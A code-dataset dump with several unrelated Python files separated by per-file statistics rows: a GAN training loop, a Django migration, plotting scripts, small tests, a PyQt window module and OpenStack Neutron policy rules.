loss_dict["real_score"] = real_pred.mean()
loss_dict["fake_score"] = fake_pred.mean()
discriminator.zero_grad()
d_loss.backward()
d_optim.step()
if args.augment and args.augment_p == 0:
ada_augment += torch.tensor(
(torch.sign(real_pred).sum().item(), real_pred.shape[0]), device=device
)
ada_augment = reduce_sum(ada_augment)
if ada_augment[1] > 255:
pred_signs, n_pred = ada_augment.tolist()
r_t_stat = pred_signs / n_pred
if r_t_stat > args.ada_target:
sign = 1
else:
sign = -1
ada_aug_p += sign * ada_aug_step * n_pred
ada_aug_p = min(1, max(0, ada_aug_p))
ada_augment.mul_(0)
d_regularize = i % args.d_reg_every == 0
if d_regularize:
real_img.requires_grad = True
real_pred = discriminator(real_img)
r1_loss = d_r1_loss(real_pred, real_img)
discriminator.zero_grad()
(args.r1 / 2 * r1_loss * args.d_reg_every + 0 * real_pred[0]).backward()
d_optim.step()
loss_dict["r1"] = r1_loss
# update G
requires_grad(generator, True)
if args.freezeD:
for i in range(args.training_features):
requires_grad(discriminator, False, target_layer=f'convs.{6-i}')
requires_grad(discriminator, False, target_layer=f'final_')
else:
requires_grad(discriminator, False)
noise = mixing_noise(args.batch, args.latent, args.mixing, device)
fake_img, _ = generator(noise)
if args.augment:
fake_img, _ = augment(fake_img, ada_aug_p)
fake_pred = discriminator(fake_img)
g_loss = g_nonsaturating_loss(fake_pred)
loss_dict["g"] = g_loss
generator.zero_grad()
g_loss.backward()
g_optim.step()
g_regularize = i % args.g_reg_every == 0
if args.finetune_loc < 0 and g_regularize:
path_batch_size = max(1, args.batch // args.path_batch_shrink)
noise = mixing_noise(path_batch_size, args.latent, args.mixing, device)
fake_img, latents = generator(noise, return_latents=True)
path_loss, mean_path_length, path_lengths = g_path_regularize(
fake_img, latents, mean_path_length
)
generator.zero_grad()
weighted_path_loss = args.path_regularize * args.g_reg_every * path_loss
if args.path_batch_shrink:
weighted_path_loss += 0 * fake_img[0, 0, 0, 0]
weighted_path_loss.backward()
g_optim.step()
mean_path_length_avg = (
reduce_sum(mean_path_length).item() / get_world_size()
)
loss_dict["path"] = path_loss
loss_dict["path_length"] = path_lengths.mean()
accumulate(g_ema, g_module, accum)
loss_reduced = reduce_loss_dict(loss_dict)
d_loss_val = loss_reduced["d"].mean().item()
g_loss_val = loss_reduced["g"].mean().item()
r1_val = loss_reduced["r1"].mean().item()
path_loss_val = loss_reduced["path"].mean().item()
real_score_val = loss_reduced["real_score"].mean().item()
fake_score_val = loss_reduced["fake_score"].mean().item()
path_length_val = loss_reduced["path_length"].mean().item()
if get_rank() == 0:
pbar.set_description(
(
f"d: {d_loss_val:.4f}; g: {g_loss_val:.4f}; r1: {r1_val:.4f}; "
f"path: {path_loss_val:.4f}; mean path: {mean_path_length_avg:.4f}; "
f"augment: {ada_aug_p:.4f}"
)
)
if i % 1000 == 0:
torch.cuda.empty_cache()
with torch.no_grad():
g_ema.eval()
sample, _ = g_ema([sample_z])
utils.save_image(
sample,
f"sample/{str(i).zfill(6)}.png",
nrow=int(args.n_sample ** 0.5),
normalize=True,
range=(-1, 1),
)
torch.cuda.empty_cache()
if i % 10000 == 0:
torch.save(
{
"g": g_module.state_dict(),
"d": d_module.state_dict(),
"g_ema": g_ema.state_dict(),
"g_optim": g_optim.state_dict(),
"d_optim": d_optim.state_dict(),
"args": args,
"ada_aug_p": ada_aug_p,
},
f"checkpoint/{str(i).zfill(6)}.pt",
| 32.045952
| 101
| 0.550222
| 1,833
| 14,645
| 4.072559
| 0.085106
| 0.01929
| 0.018754
| 0.013932
| 0.967314
| 0.963831
| 0.963831
| 0.96142
| 0.945345
| 0.932351
| 0
| 0.020189
| 0.343872
| 14,645
| 457
| 102
| 32.045952
| 0.756686
| 0
| 0
| 0.892128
| 0
| 0.005831
| 0.061583
| 0.026334
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017493
| null | null | 0.005831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f1904ec483369ca7bb18409a7123d81d2d52ac34
| 4,352
|
py
|
Python
|
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
LiquorStore/migrations/0001_initial.py
|
CPU-sangoma/PlentyPot
|
27e326f61e57746f5ca6701358d86c01b4a9ee31
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.6 on 2019-12-07 02:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0024_auto_20191205_1832'),
]
operations = [
migrations.CreateModel(
name='LiquorSalesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sale1', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='1st sale item')),
('sale2', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='2nd sale item')),
('sale3', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='3rd sale item')),
('sale4', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='4th sale item')),
('sale5', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='5th sale item')),
('sale6', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='6th sale item')),
('sale7', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='7th sale item')),
('sale8', models.ImageField(null=True, upload_to='LiquorStore/LiquorSale/', verbose_name='8th sale item')),
('company', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='profiles.BusinessProfile')),
],
),
migrations.CreateModel(
name='LiquorHomePageModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bannerImage', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='upload a big banner Image for your Home Page')),
('beer1', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under beers and cider')),
('beer2', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='second pic under beers and cider')),
('beer3', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='third pic under beers and cider')),
('beer4', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fourth pic under beers and cider')),
('beer5', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fifth pic under beers and cider')),
('beer7', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='7th pic under beers and cider')),
('beer8', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='8th pic under beers and cider')),
('bottle1', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under spirits and Vodkas')),
('bottle2', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='second pic under spirits and Vodkas')),
('bottle3', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='third pic under spirits and Vodkas')),
('bottle4', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='fourth pic under spirits and Vodkas')),
('bottle5', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='first pic under spirits and Vodkas')),
('bottle6', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='sixth pic under spirits and Vodkas')),
('bottle7', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='7th pic under spirits and Vodkas')),
('bottle8', models.ImageField(null=True, upload_to='LiquorStore/LiquorHome/', verbose_name='8th pic under spirits and Vodkas')),
('company', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='liquorhome', to='profiles.BusinessProfile')),
],
),
]
| 79.127273
| 160
| 0.66682
| 490
| 4,352
| 5.8
| 0.222449
| 0.100633
| 0.168895
| 0.202674
| 0.78114
| 0.709711
| 0.709711
| 0.709711
| 0.709711
| 0.709711
| 0
| 0.018782
| 0.192555
| 4,352
| 54
| 161
| 80.592593
| 0.789983
| 0.01034
| 0
| 0.212766
| 1
| 0
| 0.34216
| 0.144715
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042553
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74136215696e672e55af6bed198388eacc97e82c
| 6,522
|
py
|
Python
|
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
plot_thes.py
|
tdaylan/tdgu
|
824aaad9e93f30cacee365d76819962885e1dad7
|
[
"MIT"
] | null | null | null |
from __init__ import *
from scipy import signal
pathbase = os.environ["TDGU_DATA_PATH"] + '/plot_thes/'
figr, axis = plt.subplots(figsize=(6, 6))
# data
path = pathbase + 'vdisdark_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
path = pathbase + 'vdisdark_mean.csv'
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'vdisdark_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'vdisdark_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, ydatdata, yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
# models
path = pathbase + 'vdisdark_0000.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
path = pathbase + 'vdisdark_0001.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
path = pathbase + 'vdisdark_0002.csv'
xdat = loadtxt(path, delimiter=',')[:, 0]
ydat = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdat, ydat, ls='-')
axis.set_xlabel('$r$ [kpc]')
axis.set_ylabel('$v$ [km s$^{-1}$]')
path = pathbase + 'vdisdark.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Bhupal-Dev (2013)
figr, axis = plt.subplots(figsize=(6, 6))
# data
path = pathbase + 'Bhupal-Dev2013_fo_lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Bhupal-Dev2013_fo_equi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1, color='black')
axis.set_xlabel('$m_{\chi}/T$')
axis.set_ylabel('$\Omega_{\chi} h^2$')
path = pathbase + 'csecdark.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Markovic (2014)
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Markovic2014_lcdm.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1, color='black')
path = pathbase + 'Markovic2014_lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Markovic2014_medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
path = pathbase + 'Markovic2014_uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.loglog(xdatdata, ydatdata, lw=1)
axis.set_xlabel('$k$ [$h$/Mpc]')
axis.set_ylabel('$P(k)$ [(Mpc/$h$)$^3$]')
path = pathbase + 'psecwarm.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Abazajian (2013)
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Abazajian2013/lowr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1)
path = pathbase + 'Abazajian2013/medi.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1, alpha=0.5)
ydatdata = sp.signal.savgol_filter(ydatdata, 51, 3)
axis.plot(xdatdata[indx], ydatdata[indx], lw=1, alpha=0.5)
path = pathbase + 'Abazajian2013/uppr.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], ydatdata[indx], lw=1)
axis.set_xscale('log')
axis.set_xlabel('$k$ [$h$/Mpc]')
axis.set_ylabel('$T(k)$')
path = pathbase + 'psecneut.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Daylan (2016) -- spec
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Daylan2016_spec/modl.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], 1e6 * ydatdata[indx], lw=2)
path = pathbase + 'Daylan2016_spec/data_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'Daylan2016_spec/data_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'Daylan2016_spec/data_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, 1e6 * ydatdata, 1e6 * yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
axis.set_xscale('log')
axis.set_xlabel('$E$ [GeV]')
axis.set_ylabel('$E^2dI/dE$ [10$^{-6}$ GeV cm$^{-2}$ s$^{-1}$ sr$^{-1}$]')
path = pathbase + 'specgeve.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
# Daylan (2016) -- morp
figr, axis = plt.subplots(figsize=(6, 6))
path = pathbase + 'Daylan2016_morp/modl.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
indx = argsort(xdatdata)
ydatdata = loadtxt(path, delimiter=',')[:, 1]
axis.plot(xdatdata[indx], 1e6 * ydatdata[indx], lw=2)
path = pathbase + 'Daylan2016_morp/data_mean.csv'
xdatdata = loadtxt(path, delimiter=',')[:, 0]
ydatdata = loadtxt(path, delimiter=',')[:, 1]
yerrdata = empty((2, xdatdata.size))
path = pathbase + 'Daylan2016_morp/data_lowr.csv'
yerrdata[0, :] = ydatdata - loadtxt(path, delimiter=',')[:, 1]
path = pathbase + 'Daylan2016_morp/data_uppr.csv'
yerrdata[1, :] = loadtxt(path, delimiter=',')[:, 1] - ydatdata
temp, listcaps, temp = axis.errorbar(xdatdata, 1e6 * ydatdata, 1e6 * yerrdata, color='black', ls='', marker='o', lw=1, capsize=5, markersize=5)
for caps in listcaps:
caps.set_markeredgewidth(1)
axis.set_yscale('log')
axis.set_xlabel(r'$\Psi$ [deg]')
axis.set_ylabel('$E^2dI/dE$ [10$^{-6}$ GeV cm$^{-2}$ s$^{-1}$ sr$^{-1}$]')
path = pathbase + 'morpgeve.pdf'
plt.tight_layout()
figr.savefig(path)
plt.close(figr)
| 29.780822
| 143
| 0.66958
| 884
| 6,522
| 4.864253
| 0.13914
| 0.112558
| 0.204651
| 0.122093
| 0.874419
| 0.857209
| 0.857209
| 0.846047
| 0.835349
| 0.802326
| 0
| 0.040984
| 0.120822
| 6,522
| 218
| 144
| 29.917431
| 0.708929
| 0.017019
| 0
| 0.712418
| 0
| 0.013072
| 0.159063
| 0.074375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013072
| 0
| 0.013072
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7774c69e5876bc4fa493448880ace9ae2cdcebdd
| 511
|
py
|
Python
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 1
|
2021-05-26T03:44:43.000Z
|
2021-05-26T03:44:43.000Z
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 3
|
2021-06-27T23:29:56.000Z
|
2022-01-13T17:32:55.000Z
|
tests/test_generators.py
|
juanelenter/mseqgen
|
7e59af9e3a86f61a2664314755b012568cf67f28
|
[
"MIT"
] | 2
|
2020-07-02T16:54:16.000Z
|
2021-05-20T03:02:46.000Z
|
# test_single_task_stranded_with_controls_peaks
# test_single_task_stranded_with_controls_sequential
# test_single_task_stranded_with_controls_random
# test_single_task_stranded_without_controls_peaks
# test_single_task_unstranded_with_controls_peaks
# test_single_task_unstranded_without_controls_peaks
# test_multi_task_stranded_with_controls_peaks
# test_multi_task_stranded_without_controls_peaks
# test_multi_task_unstranded_with_controls_peaks
# test_multi_task_unstranded_without_controls_peaks
| 25.55
| 52
| 0.923679
| 70
| 511
| 5.885714
| 0.171429
| 0.252427
| 0.288835
| 0.213592
| 0.936893
| 0.88835
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056751
| 511
| 19
| 53
| 26.894737
| 0.854772
| 0.941292
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
778801e17eb72f75d8b508c90b2fa77bea9740af
| 592
|
py
|
Python
|
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
challanges/towers_of_hanoi/test_towers_of_hanoi.py
|
Patricia888/data-structures-and-algorithms
|
8963acf857b9f7069eeeea2884b41376986c3d7c
|
[
"MIT"
] | null | null | null |
from .towers_of_hanoi import towers_of_hanoi
def test_towers_of_hanoi_with_2_disks():
'''test with 2 disks'''
assert towers_of_hanoi(2) == (3, [2, 1], [], [])
def test_towers_of_hanoi_with_3_disks():
"""test with 3 disks"""
assert towers_of_hanoi(3) == (7, [3, 2, 1], [], [])
def test_towers_of_hanoi_with_7_disks():
"""test with 7 disks"""
assert towers_of_hanoi(7) == (127, [7, 6, 5, 4, 3, 2, 1], [], [])
def test_towers_of_hanoi_with_10_disks():
"""test with 10 disks"""
assert towers_of_hanoi(10) == (1023, [10, 9, 8, 7, 6, 5, 4, 3, 2, 1], [], [])
| 26.909091
| 81
| 0.613176
| 102
| 592
| 3.205882
| 0.215686
| 0.244648
| 0.397554
| 0.183486
| 0.648318
| 0.35474
| 0.281346
| 0.247706
| 0.247706
| 0
| 0
| 0.098326
| 0.192568
| 592
| 21
| 82
| 28.190476
| 0.585774
| 0.121622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 1
| 0.444444
| true
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bb1b98d46a9c032c8579fef8065fdc7cbe68c20e
| 4,780
|
py
|
Python
|
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
annulation.py
|
SoftDevX/MJDB
|
386bbb464fbd24c02f0d87da30e0dd11da65b764
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtCore
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from motif import Ui_efed
from motif_ import Ui_efed as motif_detail
from motif_ops import Ui_efed as rem_ops
from remarque_ops import Ui_efed as rem_entry
class Annulation(QWidget, Ui_efed):
def __init__(self, parent=None):
super(Annulation, self).__init__(parent)
self.setupUi(self)
self.setWindowTitle('Motif')
self.setWindowIcon(QIcon('Untitled-2-01.ico'))
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.setWindowModality(Qt.ApplicationModal)
self.motif = self.findChild(QTextEdit, 'motif')
self.minimize = self.findChild(QPushButton, 'mini')
self.title = self.findChild(QFrame, 'title_bar')
self.val = self.findChild(QPushButton, 'val')
self.wrong = self.findChild(QLabel, 'wrong')
self.close_btn = self.findChild(QPushButton, 'close_btn')
self.minimize.clicked.connect(lambda: self.showMinimized())
self.close_btn.clicked.connect(lambda: self.close())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
class Motif(QWidget, motif_detail):
def __init__(self, parent=None):
super(Motif, self).__init__(parent)
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.motif = self.findChild(QTextEdit, 'motif')
self.minimize = self.findChild(QPushButton, 'mini')
self.title = self.findChild(QFrame, 'title_bar')
self.val = self.findChild(QPushButton, 'val')
self.close_btn = self.findChild(QPushButton, 'close_btn')
self.minimize.clicked.connect(lambda: self.showMinimized())
self.close_btn.clicked.connect(lambda: self.close())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
class MotifOps(QWidget, rem_ops):
def __init__(self):
super(MotifOps, self).__init__()
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.close_btn.clicked.connect(lambda: self.close())
self.mini.clicked.connect(lambda: self.showMinimized())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
class RemEntry(QWidget, rem_entry):
def __init__(self):
super(RemEntry, self).__init__()
self.setupUi(self)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)
self.setWindowFlags(flags)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground, True)
self.close_btn.clicked.connect(lambda: self.close())
self.mini.clicked.connect(lambda: self.showMinimized())
def moveWindow(event):
if event.buttons() == Qt.LeftButton:
self.move(self.pos() + event.globalPos() - self.dragPos)
self.dragPos = event.globalPos()
event.accept()
self.title_bar.mouseMoveEvent = moveWindow
self.switch = 0
def mousePressEvent(self, event):
self.dragPos = event.globalPos()
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return:
self.val.animateClick()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MotifOps()
window.show()
sys.exit(app.exec())
| 34.890511
| 72
| 0.647699
| 527
| 4,780
| 5.732448
| 0.170778
| 0.031778
| 0.052963
| 0.063555
| 0.832506
| 0.818603
| 0.773916
| 0.773916
| 0.773916
| 0.773916
| 0
| 0.002193
| 0.23682
| 4,780
| 136
| 73
| 35.147059
| 0.825932
| 0
| 0
| 0.745283
| 0
| 0
| 0.019874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141509
| false
| 0
| 0.084906
| 0
| 0.264151
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24c0382861f5a1ca5b21a453667376c562a2d597
| 109,697
|
py
|
Python
|
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
skyline_apiserver/policy/manager/neutron.py
|
openstack/skyline-apiserver
|
60144767cd5513bd581fbb8eac7791887d5b276f
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from . import base
list_rules = (
base.Rule(
name="context_is_admin",
check_str=("role:admin"),
description="Rule for cloud admin access",
),
base.Rule(
name="owner",
check_str=("tenant_id:%(tenant_id)s"),
description="Rule for resource owner access",
),
base.Rule(
name="admin_or_owner",
check_str=("rule:context_is_admin or rule:owner"),
description="Rule for admin or owner access",
),
base.Rule(
name="context_is_advsvc",
check_str=("role:advsvc"),
description="Rule for advsvc role access",
),
base.Rule(
name="admin_or_network_owner",
check_str=("rule:context_is_admin or tenant_id:%(network:tenant_id)s"),
description="Rule for admin or network owner access",
),
base.Rule(
name="admin_owner_or_network_owner",
check_str=("rule:owner or rule:admin_or_network_owner"),
description="Rule for resource owner, admin or network owner access",
),
base.Rule(
name="network_owner",
check_str=("tenant_id:%(network:tenant_id)s"),
description="Rule for network owner access",
),
base.Rule(
name="admin_only",
check_str=("rule:context_is_admin"),
description="Rule for admin-only access",
),
base.Rule(
name="regular_user",
check_str=(""),
description="Rule for regular user access",
),
base.Rule(
name="shared",
check_str=("field:networks:shared=True"),
description="Rule of shared network",
),
base.Rule(
name="default",
check_str=("rule:admin_or_owner"),
description="Default access rule",
),
base.Rule(
name="admin_or_ext_parent_owner",
check_str=("rule:context_is_admin or tenant_id:%(ext_parent:tenant_id)s"),
description="Rule for common parent owner check",
),
base.Rule(
name="ext_parent_owner",
check_str=("tenant_id:%(ext_parent:tenant_id)s"),
description="Rule for common parent owner check",
),
base.Rule(
name="sg_owner",
check_str=("tenant_id:%(security_group:tenant_id)s"),
description="Rule for security group owner access",
),
base.Rule(
name="shared_address_groups",
check_str=("field:address_groups:shared=True"),
description="Definition of a shared address group",
),
base.Rule(
name="shared_address_scopes",
check_str=("field:address_scopes:shared=True"),
description="Definition of a shared address scope",
),
base.Rule(
name="get_flavor_service_profile",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="Get a flavor associated with a given service profiles. There is no corresponding GET operations in API currently. This rule is currently referred only in the DELETE of flavor_service_profile.",
),
base.Rule(
name="external",
check_str=("field:networks:router:external=True"),
description="Definition of an external network",
),
